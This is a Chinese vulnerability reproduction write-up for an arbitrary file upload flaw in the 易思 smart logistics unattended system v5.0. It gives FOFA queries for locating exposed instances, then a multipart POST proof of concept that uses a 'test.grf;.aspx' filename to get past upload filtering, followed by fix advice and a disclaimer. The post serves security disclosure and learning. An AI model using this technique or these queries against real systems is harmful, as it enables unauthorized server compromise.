易思智能物流无人值守系统文件上传漏洞复现

简介

智能物流无人值守是针对流程生产企业原料采购、产成品销售及厂内物流的统一管控智能信息化平台。 目的:全企业产供销业务的集成管理,无人值守计量、降本增效、机器替代人工,优化物流资源管控体系。

该系统5.0版本/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞

漏洞复现

FOFA语法:

"智能物流无人值守系统"

或者

web.body="智能物流无人值守系统"

易思智能物流无人值守系统文件上传漏洞复现_第1张图片

易思智能物流无人值守系统文件上传漏洞复现_第2张图片

访问界面如下所示:

易思智能物流无人值守系统文件上传漏洞复现_第3张图片

POC:/Sys_ReportFile/ImportReport?encode=test

其中test为上传后的文件名

拼接URL直接进行访问返回如下:

易思智能物流无人值守系统文件上传漏洞复现_第4张图片

可能已经进行修复并且添加了访问控制

返回信息如下:

易思智能物流无人值守系统文件上传漏洞复现_第5张图片

尝试构造POC进行利用

POST /Sys_ReportFile/ImportReport?encode=test HTTP/1.1

Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryxzUhGld6cusN3Alk
 

------WebKitFormBoundaryxzUhGld6cusN3Alk
Content-Disposition: form-data; name="file"; .filename="test.grf;.aspx"
Content-Type: application/octet-stream

test123
------WebKitFormBoundaryxzUhGld6cusN3Alk--

易思智能物流无人值守系统文件上传漏洞复现_第6张图片

拼接URL进行访问

易思智能物流无人值守系统文件上传漏洞复现_第7张图片

文件上传成功

修复建议

关注和应用厂商发布的安全补丁和更新,修复已知的文件上传漏洞。

对上传文件的类型、大小、文件名等进行验证,确保只允许上传合法的文件类型,并限制文件大小和文件名的长度。

添加访问控制。

免责声明


文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

你可能感兴趣的:(漏洞复现,安全)